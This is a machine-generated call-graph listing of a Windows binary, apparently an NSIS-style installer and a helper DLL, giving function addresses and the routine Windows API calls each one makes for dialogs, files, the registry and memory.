4035fd SetFilePointer 4618->4649 4619->4618 4650 406ab2 4620->4650 4621->4618 4623 40307a 4621->4623 4624 403082 4623->4624 4625 4030af CreateDialogParamW ShowWindow 4623->4625 4624->4618 4654 403017 4624->4654 4625->4618 4627 403090 wsprintfW 4657 405707 4627->4657 4630->4452 4632 4033a1 4631->4632 4633 403385 SetFilePointer 4631->4633 4668 40347e GetTickCount 4632->4668 4633->4632 4638 40347e 46 API calls 4639 4033d8 4638->4639 4640 403444 ReadFile 4639->4640 4643 4033e7 4639->4643 4645 40343e 4639->4645 4640->4645 4642 4061f5 ReadFile 4642->4643 4643->4642 4643->4645 4683 406224 WriteFile 4643->4683 4645->4454 4647 4061f5 ReadFile 4646->4647 4648 4035fa 4647->4648 4648->4434 4649->4442 4651 406acf PeekMessageW 4650->4651 4652 406ac5 DispatchMessageW 4651->4652 4653 406adf 4651->4653 4652->4651 4653->4618 4655 403026 4654->4655 4656 403028 MulDiv 4654->4656 4655->4656 4656->4627 4658 405722 4657->4658 4667 4030ad 4657->4667 4659 40573e lstrlenW 4658->4659 4660 4066bf 21 API calls 4658->4660 4661 405767 4659->4661 4662 40574c lstrlenW 4659->4662 4660->4659 4664 40577a 4661->4664 4665 40576d SetWindowTextW 4661->4665 4663 40575e lstrcatW 4662->4663 4662->4667 4663->4661 4666 405780 SendMessageW SendMessageW SendMessageW 4664->4666 4664->4667 4665->4664 4666->4667 4667->4618 4669 4035d6 4668->4669 4670 4034ac 4668->4670 4671 403033 36 API calls 4669->4671 4685 4035fd SetFilePointer 4670->4685 4677 4033a8 4671->4677 4673 4034b7 SetFilePointer 4679 4034dc 4673->4679 4674 4035e7 ReadFile 4674->4679 4676 403033 36 API calls 4676->4679 4677->4645 4681 4061f5 ReadFile 4677->4681 4678 406224 WriteFile 4678->4679 4679->4674 4679->4676 4679->4677 4679->4678 4680 4035b7 SetFilePointer 4679->4680 4686 406bf1 4679->4686 4680->4669 4682 4033c1 4681->4682 4682->4638 4682->4645 4684 406242 4683->4684 4684->4643 4685->4673 4687 406c16 4686->4687 4688 406c1e 4686->4688 4687->4679 4688->4687 4689 406ca5 GlobalFree 4688->4689 4690 406cae GlobalAlloc 4688->4690 4691 406d25 GlobalAlloc 4688->4691 4692 406d1c GlobalFree 4688->4692 4689->4690 4690->4687 4690->4688 4691->4687 4691->4688 4692->4691 4694 40403e 4693->4694 4710 4065c9 wsprintfW 4694->4710 4696 4040af 4711 4040e3 4696->4711 4698 403ddf 4698->4468 4699 4040b4 4699->4698 4700 4066bf 21 API calls 4699->4700 4700->4699 4701->4464 4702->4469 4714 40464d 4703->4714 4705 405824 4706 40464d SendMessageW 4705->4706 4708 405836 OleUninitialize 4706->4708 4707 4057fd 4707->4705 4717 401389 4707->4717 4708->4500 4710->4696 4712 4066bf 21 API calls 4711->4712 4713 4040f1 SetWindowTextW 4712->4713 4713->4699 4715 404665 4714->4715 4716 404656 SendMessageW 4714->4716 4715->4707 4716->4715 4719 401390 4717->4719 4718 4013fe 4718->4707 4719->4718 4720 4013cb MulDiv SendMessageW 4719->4720 4720->4719 4721->4515 4723 406019 4722->4723 4725 40602b 4722->4725 4724 406026 CharNextW 4723->4724 4723->4725 4727 40604f 4724->4727 4726 405f7e CharNextW 4725->4726 4725->4727 4726->4725 4727->4518 4727->4519 4728->4548 4729->4577 4738 40614d GetFileAttributesW 4730->4738 4733 405d61 RemoveDirectoryW 4736 405d6f 4733->4736 4734 405d69 DeleteFileW 4734->4736 4735 405d73 4735->4577 4736->4735 4737 405d7f SetFileAttributesW 4736->4737 4737->4735 4739 405d52 4738->4739 4740 40615f SetFileAttributesW 4738->4740 4739->4733 4739->4734 4739->4735 4740->4739 4742 4062f8 4741->4742 4743 40631e GetShortPathNameW 4741->4743 4768 406172 GetFileAttributesW CreateFileW 4742->4768 4745 406333 4743->4745 4746 40643d 4743->4746 4745->4746 4748 40633b wsprintfA 4745->4748 4746->4580 4747 406302 CloseHandle GetShortPathNameW 4747->4746 4749 406316 4747->4749 4750 4066bf 21 API calls 4748->4750 4749->4743 4749->4746 4751 406363 4750->4751 4769 406172 GetFileAttributesW CreateFileW 4751->4769 4753 406370 4753->4746 4754 40637f GetFileSize GlobalAlloc 4753->4754 4755 4063a1 4754->4755 4756 406436 CloseHandle 4754->4756 4757 4061f5 ReadFile 4755->4757 4756->4746 4758 4063a9 4757->4758 4758->4756 4770 4060d7 lstrlenA 4758->4770 4761 4063c0 lstrcpyA 4764 4063e2 4761->4764 4762 4063d4 4763 4060d7 4 API calls 4762->4763 4763->4764 4765 406419 SetFilePointer 4764->4765 4766 406224 WriteFile 4765->4766 4767 40642f GlobalFree 4766->4767 4767->4756 4768->4747 4769->4753 4771 406118 lstrlenA 4770->4771 4772 406120 4771->4772 4773 4060f1 lstrcmpiA 4771->4773 4772->4761 4772->4762 4773->4772 4774 40610f CharNextA 4773->4774 4774->4771 4776 403ccd 4775->4776 4777 403c96 4776->4777 4778 403cd2 FreeLibrary GlobalFree 4776->4778 4777->4596 4778->4777 4778->4778 4785 4015c6 4786 402dab 21 API calls 4785->4786 4787 4015cd 4786->4787 4788 405ffc 4 API calls 4787->4788 4793 4015d6 4788->4793 4789 401636 4791 401668 4789->4791 4792 40163b 4789->4792 4790 405f7e CharNextW 4790->4793 4796 401423 28 API calls 4791->4796 4804 401423 4792->4804 4793->4789 4793->4790 4797 405c30 2 API calls 4793->4797 4799 405c4d 5 API calls 4793->4799 4802 40161c GetFileAttributesW 4793->4802 4803 405bd6 2 API calls 4793->4803 4801 401660 4796->4801 4797->4793 4799->4793 4800 40164f SetCurrentDirectoryW 4800->4801 4802->4793 4803->4793 4805 405707 28 API calls 4804->4805 4806 401431 4805->4806 4807 406682 lstrcpynW 4806->4807 4807->4800 5273 405846 5274 4059f0 5273->5274 5275 405867 GetDlgItem GetDlgItem GetDlgItem 5273->5275 5277 405a21 5274->5277 5278 4059f9 GetDlgItem CreateThread CloseHandle 5274->5278 5318 404636 SendMessageW 5275->5318 5280 405a71 5277->5280 5281 405a38 ShowWindow ShowWindow 5277->5281 5282 405a4c 5277->5282 5278->5277 5279 4058d7 5284 4058de GetClientRect GetSystemMetrics SendMessageW SendMessageW 5279->5284 5288 404668 8 API calls 5280->5288 5320 404636 SendMessageW 5281->5320 5283 405aac 5282->5283 5286 405a60 5282->5286 5287 405a86 ShowWindow 5282->5287 5283->5280 5291 405aba SendMessageW 5283->5291 5289 405930 SendMessageW SendMessageW 5284->5289 5290 40594c 5284->5290 5321 4045da 5286->5321 5294 405aa6 5287->5294 5295 405a98 5287->5295 5293 405a7f 5288->5293 5289->5290 5296 405951 SendMessageW 5290->5296 5297 40595f 5290->5297 5291->5293 5298 405ad3 CreatePopupMenu 5291->5298 5300 4045da SendMessageW 5294->5300 5299 405707 28 API calls 5295->5299 5296->5297 5302 404601 22 API calls 5297->5302 5301 4066bf 21 API calls 5298->5301 5299->5294 5300->5283 5303 405ae3 AppendMenuW 5301->5303 5304 40596f 5302->5304 5305 405b00 GetWindowRect 5303->5305 5306 405b13 TrackPopupMenu 5303->5306 5307 405978 ShowWindow 5304->5307 5308 4059ac GetDlgItem SendMessageW 5304->5308 5305->5306 5306->5293 5309 405b2e 5306->5309 5310 40599b 5307->5310 5311 40598e ShowWindow 5307->5311 5308->5293 5312 4059d3 SendMessageW SendMessageW 5308->5312 5313 405b4a SendMessageW 5309->5313 5319 404636 SendMessageW 5310->5319 5311->5310 5312->5293 5313->5313 5314 405b67 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5313->5314 5316 405b8c SendMessageW 5314->5316 5316->5316 5317 405bb5 GlobalUnlock SetClipboardData CloseClipboard 5316->5317 5317->5293 5318->5279 5319->5308 5320->5282 5322 4045e1 5321->5322 5323 4045e7 SendMessageW 5321->5323 5322->5323 5323->5280 5324 6fbb103d 5327 6fbb101b 5324->5327 5334 6fbb15b6 5327->5334 5329 6fbb1020 5330 6fbb1027 GlobalAlloc 5329->5330 5331 6fbb1024 5329->5331 5330->5331 5332 6fbb15dd 3 API calls 5331->5332 5333 6fbb103b 5332->5333 5336 6fbb15bc 5334->5336 5335 6fbb15c2 5335->5329 5336->5335 5337 6fbb15ce GlobalFree 5336->5337 5337->5329 4808 401c48 4809 402d89 21 API calls 4808->4809 4810 401c4f 4809->4810 4811 402d89 21 API calls 4810->4811 4812 401c5c 4811->4812 4813 401c71 4812->4813 4814 402dab 21 API calls 4812->4814 4815 401c81 4813->4815 4816 402dab 21 API calls 4813->4816 4814->4813 4817 401cd8 4815->4817 4818 401c8c 4815->4818 4816->4815 4819 402dab 21 API calls 4817->4819 4820 402d89 21 API calls 4818->4820 4821 401cdd 4819->4821 4822 401c91 4820->4822 4823 402dab 21 API calls 4821->4823 4824 402d89 21 API calls 4822->4824 4825 401ce6 FindWindowExW 4823->4825 4826 401c9d 4824->4826 4829 401d08 4825->4829 4827 401cc8 SendMessageW 4826->4827 4828 401caa SendMessageTimeoutW 4826->4828 4827->4829 4828->4829 5338 404e48 5339 404e74 5338->5339 5340 404e58 5338->5340 5341 404ea7 5339->5341 5342 404e7a SHGetPathFromIDListW 5339->5342 5349 405cc6 GetDlgItemTextW 5340->5349 5345 404e91 SendMessageW 5342->5345 5346 404e8a 5342->5346 5344 404e65 SendMessageW 5344->5339 5345->5341 5347 40140b 2 API calls 5346->5347 5347->5345 5349->5344 5350 4028c9 5351 4028cf 5350->5351 5352 4028d7 FindClose 5351->5352 5353 402c2f 5351->5353 5352->5353 5357 4016d1 5358 402dab 21 API calls 5357->5358 5359 4016d7 GetFullPathNameW 5358->5359 5360 4016f1 5359->5360 5361 401713 5359->5361 5360->5361 5364 4069df 2 API calls 5360->5364 5362 401728 GetShortPathNameW 5361->5362 5363 402c2f 5361->5363 5362->5363 5365 401703 5364->5365 5365->5361 5367 406682 lstrcpynW 5365->5367 5367->5361 5368 401e53 GetDC 5369 402d89 21 API calls 5368->5369 5370 401e65 GetDeviceCaps MulDiv ReleaseDC 5369->5370 5371 402d89 21 API calls 5370->5371 5372 401e96 5371->5372 5373 4066bf 21 API calls 5372->5373 5374 401ed3 CreateFontIndirectW 5373->5374 5375 40263d 5374->5375 5376 402955 5377 402dab 21 API calls 5376->5377 5378 402961 5377->5378 5379 402977 5378->5379 5380 402dab 21 API calls 5378->5380 5381 40614d 2 API calls 5379->5381 5380->5379 5382 40297d 5381->5382 5404 406172 GetFileAttributesW CreateFileW 5382->5404 5384 40298a 5385 402a40 5384->5385 5386 4029a5 GlobalAlloc 5384->5386 5387 402a28 5384->5387 5388 402a47 DeleteFileW 5385->5388 5389 402a5a 5385->5389 5386->5387 5390 4029be 5386->5390 5391 403376 48 API calls 5387->5391 5388->5389 5405 4035fd SetFilePointer 5390->5405 5393 402a35 CloseHandle 5391->5393 5393->5385 5394 4029c4 5395 4035e7 ReadFile 5394->5395 5396 4029cd GlobalAlloc 5395->5396 5397 402a11 5396->5397 5398 4029dd 5396->5398 5399 406224 WriteFile 5397->5399 5400 403376 48 API calls 5398->5400 5401 402a1d GlobalFree 5399->5401 5403 4029ea 5400->5403 5401->5387 5402 402a08 GlobalFree 5402->5397 5403->5402 5404->5384 5405->5394 5420 4014d7 5421 402d89 21 API calls 5420->5421 5422 4014dd Sleep 5421->5422 5424 402c2f 5422->5424 5425 40195b 5426 402dab 21 API calls 5425->5426 5427 401962 lstrlenW 5426->5427 5428 40263d 5427->5428 5003 4020dd 5004 4020ef 5003->5004 5014 4021a1 5003->5014 5005 402dab 21 API calls 5004->5005 5006 4020f6 5005->5006 5008 402dab 21 API calls 5006->5008 5007 401423 28 API calls 5012 4022fb 5007->5012 5009 4020ff 5008->5009 5010 402115 LoadLibraryExW 5009->5010 5011 402107 GetModuleHandleW 5009->5011 5013 402126 5010->5013 5010->5014 5011->5010 5011->5013 5026 406ae5 5013->5026 5014->5007 5017 402170 5019 405707 28 API calls 5017->5019 5018 402137 5020 402156 5018->5020 5021 40213f 5018->5021 5022 402147 5019->5022 5031 6fbb1817 5020->5031 5023 401423 28 API calls 5021->5023 5022->5012 5024 402193 FreeLibrary 5022->5024 5023->5022 5024->5012 5073 4066a4 WideCharToMultiByte 5026->5073 5028 406b02 5029 406b09 GetProcAddress 5028->5029 5030 402131 5028->5030 5029->5030 5030->5017 5030->5018 5032 6fbb184a 5031->5032 5074 6fbb1bff 5032->5074 5034 6fbb1851 5035 6fbb1976 5034->5035 5036 6fbb1869 5034->5036 5037 6fbb1862 5034->5037 5035->5022 5108 6fbb2480 5036->5108 5124 6fbb243e 5037->5124 5042 6fbb18af 5137 6fbb2655 5042->5137 5043 6fbb18cd 5048 6fbb191e 5043->5048 5049 6fbb18d3 5043->5049 5044 6fbb1898 5061 6fbb188e 5044->5061 5134 6fbb2e23 5044->5134 5045 6fbb187f 5047 6fbb1885 5045->5047 5054 6fbb1890 5045->5054 5047->5061 5118 6fbb2b98 5047->5118 5052 6fbb2655 10 API calls 5048->5052 5156 6fbb1666 5049->5156 5062 6fbb190f 5052->5062 5053 6fbb18b5 5148 6fbb1654 5053->5148 5128 6fbb2810 5054->5128 5059 6fbb1896 5059->5061 5060 6fbb2655 10 API calls 5060->5062 5061->5042 5061->5043 5064 6fbb1965 5062->5064 5162 6fbb2618 5062->5162 5064->5035 5066 6fbb196f GlobalFree 5064->5066 5066->5035 5070 6fbb1951 5070->5064 5166 6fbb15dd wsprintfW 5070->5166 5072 6fbb194a FreeLibrary 5072->5070 5073->5028 5169 6fbb12bb GlobalAlloc 5074->5169 5076 6fbb1c26 5170 6fbb12bb GlobalAlloc 5076->5170 5078 6fbb1e6b GlobalFree GlobalFree GlobalFree 5080 6fbb1e88 5078->5080 5095 6fbb1ed2 5078->5095 5079 6fbb1c31 5079->5078 5082 6fbb1d26 GlobalAlloc 5079->5082 5084 6fbb1d71 lstrcpyW 5079->5084 5085 6fbb1d8f GlobalFree 5079->5085 5089 6fbb1d7b lstrcpyW 5079->5089 5092 6fbb21ae 5079->5092 5094 6fbb2126 5079->5094 5079->5095 5099 6fbb2067 GlobalFree 5079->5099 5102 6fbb12cc 2 API calls 5079->5102 5103 6fbb1dcd 5079->5103 5081 6fbb227e 5080->5081 5090 6fbb1e9d 5080->5090 5080->5095 5083 6fbb22a0 GetModuleHandleW 5081->5083 5081->5095 5082->5079 5086 6fbb22b1 LoadLibraryW 5083->5086 5087 6fbb22c6 5083->5087 5084->5089 5085->5079 5086->5087 5086->5095 5177 6fbb16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5087->5177 5089->5079 5090->5095 5173 6fbb12cc 5090->5173 5091 6fbb22d8 5093 6fbb2318 5091->5093 5106 6fbb2302 GetProcAddress 5091->5106 5092->5095 5105 6fbb2216 lstrcpyW 5092->5105 5093->5095 5097 6fbb2325 lstrlenW 5093->5097 5176 6fbb12bb GlobalAlloc 5094->5176 5095->5034 5178 6fbb16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5097->5178 5099->5079 5101 6fbb233f 5101->5095 5102->5079 5103->5079 5171 6fbb162f GlobalSize GlobalAlloc 5103->5171 5105->5095 5106->5093 5107 6fbb212f 5107->5034 5115 6fbb2498 5108->5115 5110 6fbb25c1 GlobalFree 5113 6fbb186f 5110->5113 5110->5115 5111 6fbb256b GlobalAlloc CLSIDFromString 5111->5110 5112 6fbb2540 GlobalAlloc WideCharToMultiByte 5112->5110 5113->5044 5113->5045 5113->5061 5114 6fbb12cc GlobalAlloc lstrcpynW 5114->5115 5115->5110 5115->5111 5115->5112 5115->5114 5117 6fbb258a 5115->5117 5180 6fbb135a 5115->5180 5117->5110 5184 6fbb27a4 5117->5184 5120 6fbb2baa 5118->5120 5119 6fbb2c4f CloseHandle 5123 6fbb2c6d 5119->5123 5120->5119 5122 6fbb2d39 5122->5061 5187 6fbb2b42 5123->5187 5125 6fbb2453 5124->5125 5126 6fbb245e GlobalAlloc 5125->5126 5127 6fbb1868 5125->5127 5126->5125 5127->5036 5132 6fbb2840 5128->5132 5129 6fbb28db GlobalAlloc 5133 6fbb28fe 5129->5133 5130 6fbb28ee 5131 6fbb28f4 GlobalSize 5130->5131 5130->5133 5131->5133 5132->5129 5132->5130 5133->5059 5135 6fbb2e2e 5134->5135 5136 6fbb2e6e GlobalFree 5135->5136 5191 6fbb12bb GlobalAlloc 5137->5191 5139 6fbb270b lstrcpynW 5145 6fbb265f 5139->5145 5140 6fbb26fa StringFromGUID2 5140->5145 5141 6fbb26d8 MultiByteToWideChar 5141->5145 5142 6fbb271e wsprintfW 5142->5145 5143 6fbb2742 GlobalFree 5143->5145 5144 6fbb2777 GlobalFree 5144->5053 5145->5139 5145->5140 5145->5141 5145->5142 5145->5143 5145->5144 5146 6fbb1312 2 API calls 5145->5146 5192 6fbb1381 5145->5192 5146->5145 5196 6fbb12bb GlobalAlloc 5148->5196 5150 6fbb1659 5151 6fbb1666 2 API calls 5150->5151 5152 6fbb1663 5151->5152 5153 6fbb1312 5152->5153 5154 6fbb131b GlobalAlloc lstrcpynW 5153->5154 5155 6fbb1355 GlobalFree 5153->5155 5154->5155 5155->5062 5157 6fbb169f lstrcpyW 5156->5157 5158 6fbb1672 wsprintfW 5156->5158 5161 6fbb16b8 5157->5161 5158->5161 5161->5060 5163 6fbb2626 5162->5163 5164 6fbb1931 5162->5164 5163->5164 5165 6fbb2642 GlobalFree 5163->5165 5164->5070 5164->5072 5165->5163 5167 6fbb1312 2 API calls 5166->5167 5168 6fbb15fe 5167->5168 5168->5064 5169->5076 5170->5079 5172 6fbb164d 5171->5172 5172->5103 5179 6fbb12bb GlobalAlloc 5173->5179 5175 6fbb12db lstrcpynW 5175->5095 5176->5107 5177->5091 5178->5101 5179->5175 5181 6fbb1361 5180->5181 5182 6fbb12cc 2 API calls 5181->5182 5183 6fbb137f 5182->5183 5183->5115 5185 6fbb2808 5184->5185 5186 6fbb27b2 VirtualAlloc 5184->5186 5185->5117 5186->5185 5188 6fbb2b4d 5187->5188 5189 6fbb2b5d 5188->5189 5190 6fbb2b52 GetLastError 5188->5190 5189->5122 5190->5189 5191->5145 5193 6fbb138a 5192->5193 5194 6fbb13ac 5192->5194 5193->5194 5195 6fbb1390 lstrcpyW 5193->5195 5194->5145 5195->5194 5196->5150 5436 402b5e 5437 402bb0 5436->5437 5438 402b65 5436->5438 5439 406a76 5 API calls 5437->5439 5440 402d89 21 API calls 5438->5440 5442 402bae 5438->5442 5441 402bb7 5439->5441 5443 402b73 5440->5443 5444 402dab 21 API calls 5441->5444 5445 402d89 21 API calls 5443->5445 5446 402bc0 5444->5446 5449 402b7f 5445->5449 5446->5442 5447 402bc4 IIDFromString 5446->5447 5447->5442 5448 402bd3 5447->5448 5448->5442 5454 406682 lstrcpynW 5448->5454 5453 4065c9 wsprintfW 5449->5453 5451 402bf0 CoTaskMemFree 5451->5442 5453->5442 5454->5451 5455 402a60 5456 402d89 21 API calls 5455->5456 5457 402a66 5456->5457 5458 402aa9 5457->5458 5459 402a8d 5457->5459 5464 402933 5457->5464 5462 402ac3 5458->5462 5463 402ab3 5458->5463 5460 402a92 5459->5460 5461 402aa3 5459->5461 5469 406682 lstrcpynW 5460->5469 5470 4065c9 wsprintfW 5461->5470 5466 4066bf 21 API calls 5462->5466 5465 402d89 21 API calls 5463->5465 5465->5464 5466->5464 5469->5464 5470->5464 4235 401761 4241 402dab 4235->4241 4239 40176f 4240 4061a1 2 API calls 4239->4240 4240->4239 4242 402db7 4241->4242 4251 4066bf 4242->4251 4245 401768 4247 4061a1 4245->4247 4248 4061ae GetTickCount GetTempFileNameW 4247->4248 4249 4061e8 4248->4249 4250 4061e4 4248->4250 4249->4239 4250->4248 4250->4249 4266 4066ca 4251->4266 4252 406911 4253 402dd8 4252->4253 4290 406682 lstrcpynW 4252->4290 4253->4245 4268 406930 4253->4268 4255 4068e2 lstrlenW 4255->4266 4259 4067db GetSystemDirectoryW 4259->4266 4260 4066bf 15 API calls 4260->4255 4261 4067f1 GetWindowsDirectoryW 4261->4266 4262 4066bf 15 API calls 4262->4266 4263 406883 lstrcatW 4263->4266 4264 406930 5 API calls 4264->4266 4266->4252 4266->4255 4266->4259 4266->4260 4266->4261 4266->4262 4266->4263 4266->4264 4267 406853 SHGetPathFromIDListW CoTaskMemFree 4266->4267 4277 406550 4266->4277 4282 406a76 GetModuleHandleA 4266->4282 4288 4065c9 wsprintfW 4266->4288 4289 406682 lstrcpynW 4266->4289 4267->4266 4275 40693d 4268->4275 4269 4069b3 4270 4069b8 CharPrevW 4269->4270 4273 4069d9 4269->4273 4270->4269 4271 4069a6 CharNextW 4271->4269 4271->4275 4273->4245 4274 406992 CharNextW 4274->4275 4275->4269 4275->4271 4275->4274 4276 4069a1 CharNextW 4275->4276 4298 405f7e 4275->4298 4276->4271 4291 4064ef 4277->4291 4280 4065b4 4280->4266 4281 406584 RegQueryValueExW RegCloseKey 4281->4280 4283 406a92 4282->4283 4284 406a9c GetProcAddress 4282->4284 4295 406a06 GetSystemDirectoryW 4283->4295 4286 406aab 4284->4286 4286->4266 4287 406a98 4287->4284 4287->4286 4288->4266 4289->4266 4290->4253 4292 4064fe 4291->4292 4293 406507 RegOpenKeyExW 4292->4293 4294 406502 4292->4294 4293->4294 4294->4280 4294->4281 4296 406a28 wsprintfW LoadLibraryExW 4295->4296 4296->4287 4299 405f84 4298->4299 4300 405f9a 4299->4300 4301 405f8b CharNextW 4299->4301 4300->4275 4301->4299 5471 401d62 5472 402d89 21 API calls 5471->5472 5473 401d73 SetWindowLongW 5472->5473 5474 402c2f 5473->5474 5475 4028e3 5476 4028eb 5475->5476 5477 4028ef FindNextFileW 5476->5477 5479 402901 5476->5479 5478 402948 5477->5478 5477->5479 5481 406682 lstrcpynW 5478->5481 5481->5479 5482 401568 5483 402ba9 5482->5483 5486 4065c9 wsprintfW 5483->5486 5485 402bae 5486->5485 5494 40196d 5495 402d89 21 API calls 5494->5495 5496 401974 5495->5496 5497 402d89 21 API calls 5496->5497 5498 401981 5497->5498 5499 402dab 21 API calls 5498->5499 5500 401998 lstrlenW 5499->5500 5501 4019a9 5500->5501 5502 4019ea 5501->5502 5506 406682 lstrcpynW 5501->5506 5504 4019da 5504->5502 5505 4019df lstrlenW 5504->5505 5505->5502 5506->5504 5507 40506e GetDlgItem GetDlgItem 5508 4050c0 7 API calls 5507->5508 5520 4052e5 5507->5520 5509 405167 DeleteObject 5508->5509 5510 40515a SendMessageW 5508->5510 5511 405170 5509->5511 5510->5509 5513 4051a7 5511->5513 5514 4066bf 21 API calls 5511->5514 5512 4053c7 5516 405473 5512->5516 5526 405420 SendMessageW 5512->5526 5549 4052d8 5512->5549 5515 404601 22 API calls 5513->5515 5519 405189 SendMessageW SendMessageW 5514->5519 5521 4051bb 5515->5521 5517 405485 5516->5517 5518 40547d SendMessageW 5516->5518 5528 405497 ImageList_Destroy 5517->5528 5529 40549e 5517->5529 5545 4054ae 5517->5545 5518->5517 5519->5511 5520->5512 5550 405354 5520->5550 5561 404fbc SendMessageW 5520->5561 5525 404601 22 API calls 5521->5525 5522 4053b9 SendMessageW 5522->5512 5523 404668 8 API calls 5527 405674 5523->5527 5530 4051cc 5525->5530 5532 405435 SendMessageW 5526->5532 5526->5549 5528->5529 5533 4054a7 GlobalFree 5529->5533 5529->5545 5534 4052a7 GetWindowLongW SetWindowLongW 5530->5534 5541 4052a2 5530->5541 5544 40521f SendMessageW 5530->5544 5546 405271 SendMessageW 5530->5546 5547 40525d SendMessageW 5530->5547 5531 405628 5536 40563a ShowWindow GetDlgItem ShowWindow 5531->5536 5531->5549 5535 405448 5532->5535 5533->5545 5537 4052c0 5534->5537 5540 405459 SendMessageW 5535->5540 5536->5549 5538 4052c5 ShowWindow 5537->5538 5539 4052dd 5537->5539 5559 404636 SendMessageW 5538->5559 5560 404636 SendMessageW 5539->5560 5540->5516 5541->5534 5541->5537 5544->5530 5545->5531 5552 4054e9 5545->5552 5566 40503c 5545->5566 5546->5530 5547->5530 5549->5523 5550->5512 5550->5522 5551 4055f3 5553 4055fe InvalidateRect 5551->5553 5556 40560a 5551->5556 5554 405517 SendMessageW 5552->5554 5555 40552d 5552->5555 5553->5556 5554->5555 5555->5551 5557 4055a1 SendMessageW SendMessageW 5555->5557 5556->5531 5575 404f77 5556->5575 5557->5555 5559->5549 5560->5520 5562 40501b SendMessageW 5561->5562 5563 404fdf GetMessagePos ScreenToClient SendMessageW 5561->5563 5564 405013 5562->5564 5563->5564 5565 405018 5563->5565 5564->5550 5565->5562 5578 406682 lstrcpynW 5566->5578 5568 40504f 5579 4065c9 wsprintfW 5568->5579 5570 405059 5571 40140b 2 API calls 5570->5571 5572 405062 5571->5572 5580 406682 lstrcpynW 5572->5580 5574 405069 5574->5552 5581 404eae 5575->5581 5577 404f8c 5577->5531 5578->5568 5579->5570 5580->5574 5582 404ec7 5581->5582 5583 4066bf 21 API calls 5582->5583 5584 404f2b 5583->5584 5585 4066bf 21 API calls 5584->5585 5586 404f36 5585->5586 5587 4066bf 21 API calls 5586->5587 5588 404f4c lstrlenW wsprintfW SetDlgItemTextW 5587->5588 5588->5577 5589 40166f 5590 402dab 21 API calls 5589->5590 5591 401675 5590->5591 5592 4069df 2 API calls 5591->5592 5593 40167b 5592->5593 5594 402af0 5595 402d89 21 API calls 5594->5595 5596 402af6 5595->5596 5597 402933 5596->5597 5598 4066bf 21 API calls 5596->5598 5598->5597 4880 4026f1 4881 402d89 21 API calls 4880->4881 4882 402700 4881->4882 4883 40274a ReadFile 4882->4883 4884 4061f5 ReadFile 4882->4884 4886 40278a MultiByteToWideChar 4882->4886 4887 40283f 4882->4887 4889 4027e3 4882->4889 4890 4027b0 SetFilePointer MultiByteToWideChar 4882->4890 4891 402850 4882->4891 4893 40283d 4882->4893 4883->4882 4883->4893 4884->4882 4886->4882 4903 4065c9 wsprintfW 4887->4903 4889->4882 4889->4893 4894 406253 SetFilePointer 4889->4894 4890->4882 4892 402871 SetFilePointer 4891->4892 4891->4893 4892->4893 4895 40626f 4894->4895 4900 406287 4894->4900 4896 4061f5 ReadFile 4895->4896 4897 40627b 4896->4897 4898 406290 SetFilePointer 4897->4898 4899 4062b8 SetFilePointer 4897->4899 4897->4900 4898->4899 4901 40629b 4898->4901 4899->4900 4900->4889 4902 406224 WriteFile 4901->4902 4902->4900 4903->4893 5599 404771 lstrlenW 5600 404790 5599->5600 5601 404792 WideCharToMultiByte 5599->5601 5600->5601 5602 404af2 5603 404b1e 5602->5603 5604 404b2f 5602->5604 5663 405cc6 GetDlgItemTextW 5603->5663 5605 404b3b GetDlgItem 5604->5605 5612 404b9a 5604->5612 5607 404b4f 5605->5607 5611 404b63 SetWindowTextW 5607->5611 5616 405ffc 4 API calls 5607->5616 5608 404c7e 5613 404e2d 5608->5613 5665 405cc6 GetDlgItemTextW 5608->5665 5609 404b29 5610 406930 5 API calls 5609->5610 5610->5604 5617 404601 22 API calls 5611->5617 5612->5608 5612->5613 5618 4066bf 21 API calls 5612->5618 5615 404668 8 API calls 5613->5615 5620 404e41 5615->5620 5621 404b59 5616->5621 5622 404b7f 5617->5622 5623 404c0e SHBrowseForFolderW 5618->5623 5619 404cae 5624 406059 18 API calls 5619->5624 5621->5611 5628 405f51 3 API calls 5621->5628 5625 404601 22 API calls 5622->5625 5623->5608 5626 404c26 CoTaskMemFree 5623->5626 5627 404cb4 5624->5627 5629 404b8d 5625->5629 5630 405f51 3 API calls 5626->5630 5666 406682 lstrcpynW 5627->5666 5628->5611 5664 404636 SendMessageW 5629->5664 5632 404c33 5630->5632 5636 404c6a SetDlgItemTextW 5632->5636 5639 4066bf 21 API calls 5632->5639 5634 404ccb 5638 406a76 5 API calls 5634->5638 5635 404b93 5637 406a76 5 API calls 5635->5637 5636->5608 5637->5612 5645 404cd2 5638->5645 5640 404c52 lstrcmpiW 5639->5640 5640->5636 5642 404c63 lstrcatW 5640->5642 5641 404d13 5667 406682 lstrcpynW 5641->5667 5642->5636 5644 404d1a 5646 405ffc 4 API calls 5644->5646 5645->5641 5650 405f9d 2 API calls 5645->5650 5651 404d6b 5645->5651 5647 404d20 GetDiskFreeSpaceW 5646->5647 5649 404d44 MulDiv 5647->5649 5647->5651 5649->5651 5650->5645 5652 404ddc 5651->5652 5654 404f77 24 API calls 5651->5654 5653 404dff 5652->5653 5656 40140b 2 API calls 5652->5656 5668 404623 EnableWindow 5653->5668 5655 404dc9 5654->5655 5657 404dde SetDlgItemTextW 5655->5657 5658 404dce 5655->5658 5656->5653 5657->5652 5660 404eae 24 API calls 5658->5660 5660->5652 5661 404e1b 5661->5613 5662 404a4b SendMessageW 5661->5662 5662->5613 5663->5609 5664->5635 5665->5619 5666->5634 5667->5644 5668->5661 4904 401774 4905 402dab 21 API calls 4904->4905 4906 40177b 4905->4906 4907 4017a3 4906->4907 4908 40179b 4906->4908 4945 406682 lstrcpynW 4907->4945 4944 406682 lstrcpynW 4908->4944 4911 4017a1 4915 406930 5 API calls 4911->4915 4912 4017ae 4913 405f51 3 API calls 4912->4913 4914 4017b4 lstrcatW 4913->4914 4914->4911 4933 4017c0 4915->4933 4916 4069df 2 API calls 4916->4933 4917 4017fc 4918 40614d 2 API calls 4917->4918 4918->4933 4920 4017d2 CompareFileTime 4920->4933 4921 401892 4923 405707 28 API calls 4921->4923 4922 401869 4924 405707 28 API calls 4922->4924 4932 40187e 4922->4932 4926 40189c 4923->4926 4924->4932 4925 406682 lstrcpynW 4925->4933 4927 403376 48 API calls 4926->4927 4928 4018af 4927->4928 4929 4018c3 SetFileTime 4928->4929 4931 4018d5 CloseHandle 4928->4931 4929->4931 4930 4066bf 21 API calls 4930->4933 4931->4932 4934 4018e6 4931->4934 4933->4916 